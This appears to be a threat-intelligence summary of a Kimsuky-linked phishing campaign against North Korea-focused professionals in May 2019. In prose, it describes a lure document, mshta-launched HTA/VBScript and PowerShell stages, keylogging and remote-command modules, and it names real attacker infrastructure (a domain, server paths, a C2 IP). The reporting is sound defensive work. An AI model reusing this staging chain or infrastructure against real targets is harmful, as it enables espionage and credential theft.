ESRC reports that the Kimsuky-linked Campaign Smoke Screen continued in May 2019 against South Korean and U.S. professionals working on North Korea-related issues. One observed DOC lure impersonated a U.S. think-tank researcher, used Korean-language document artifacts and the “windowsmb” account, and launched mshta to bit-albania.com paths that decoded HTA/VBScript and PowerShell stages. The infrastructure exposed multiple remote-command and payload paths, including expres.php, upload.php, cow.gif, exe.gif, and PowerShell modules for directory, command, executable, deletion, and keylogging functions. Decoded payloads included EGIS-signed malware and a Chinese-language PCRat Server.dll communicating with 173.248.170.149, tying the campaign to remote-access and information-stealing capability rather than a generic phishing alert.